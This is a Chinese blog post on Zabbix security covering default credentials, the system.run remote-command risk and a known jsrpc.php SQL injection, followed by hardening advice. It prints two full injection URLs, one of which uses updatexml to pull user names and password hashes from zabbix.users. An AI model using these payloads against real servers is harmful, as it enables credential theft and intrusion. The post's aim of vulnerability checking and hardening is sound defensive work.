1. 程式人生 > >zabbix系列之安全

zabbix系列之安全

svi 默認 remote concat url 設置 問題 測試 bug

https://blog.csdn.net/xiaoyu_0217/article/details/73500125

存在問題:

1)zabbixAdmin口令太弱或使用默認口令(Admin/zabbix),被攻擊後導致zabbix服務器暴露,攻擊者可創建”system.run[command,<mode>]”監控項執行命令,甚至獲取服務器shell,獲取root權限。

說明:system.run[command,<mode>]命令是agent自帶的,使zabbix server可遠程在agent機器上執行任意命令,如果為了方便把agent啟動用戶設置為root的話(AllowRoot=1)

非常危險。

2)最近爆出的zabbix漏洞,在url路徑(http://****/zabbi/)後加以下代碼

/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

輸出結果如下則表示存在漏洞:

http://www.freebuf.com/vuls/112197.html

以上為僅為漏洞驗證測試方式,攻擊者可以通過進一步構造語句進行錯誤型sql註射,無需獲取和破解加密的管理員密碼.漏洞具體利用

https://zhuanlan.zhihu.com/p/22082375

https://www.cnblogs.com/s0ky1xd/p/5874043.html

漏洞詳細說明:https://www.seebug.org/vuldb/ssvid-92302

措施:

1、很重要的一點,zabbix的登錄口令一定要復雜,不要用默認口令或弱口令。

2zabbixserveragent都不要以root啟動,不要設置AllowRoot=1

3、禁止agent執行system.run,不要設置EnableRemoteCommands=1

4、經常打安全補丁,如果系統內核版本過低有漏洞的話,即使在zabbix用戶下照樣能獲取root權限。

5.不要使用默認的 admin ,修改成其他的,guest登錄也取消吧補丁也打打吧

其他參考:

http://www.cnblogs.com/skyflask/p/7499925.html

zabbix系列之安全